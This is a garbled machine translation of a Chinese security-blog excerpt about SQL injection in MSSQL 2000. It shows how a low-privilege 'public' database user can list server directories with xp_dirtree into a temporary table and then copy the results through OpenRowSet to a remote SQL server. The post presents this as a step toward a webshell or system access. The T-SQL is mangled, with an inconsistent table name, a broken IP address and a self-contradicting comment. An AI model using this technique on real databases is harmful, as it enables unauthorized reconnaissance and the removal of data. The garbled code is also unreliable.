Software Author: kj021320
Source: I .s. t. o Technical Team (http://blog.csdn.net/ I _S_T_O)
OriginallyArticleIt's been a long time in the team! It is only a small part of <art of SQL Injection>, but it is a pity that many pieces of data have been collected for a long time, but it is estimated that it will not be available at the end of the year ~ Then we will release it first! This is mainly because mssql2005 has all come! 2 K will be eliminated soon ~ Let's talk to you ~ The advertisement is finished...
Body:
Many people may feel depressed when talking about public permissions ~ N I read an article about getting webshell or system permissions under the public and db_owner permissions in MSSQL (the name is really long -_-!!!), It says there is no way to use xp_regread, xp_dirtree... The reason for these stored procedures is that there is no way to create a table in public. Here I will correct the fact that public can be used to create a table ~ So that these stored procedures can be used efficiently.CodeRight
-- Create a temporary table. Generally, we cannot create a temporary table. We can only create a temporary table.
Create Table # nonamed (
Dir ntext,
Num int
)
-- Call the stored procedure to save the executed data to the temporary table
Insert ## nonamed execute Master .. xp_dirtree 'C: \ ', 1
-- Use the OpenRowSet function to export the data in the temporary table to the dirtree table in the local MSSQL.
Insert into OpenRowSet ('sqloledb', '192. 0.0.1 '; 'user'; 'pass', 'select * From northwind. DBO. dirtree ')
Select * from # nonamed
The above method, that is to say, public can traverse the directories on the user server. What are the specific usage values ~ Haha
Trackback: http://tb.blog.csdn.net/TrackBack.aspx? Postid = 1736964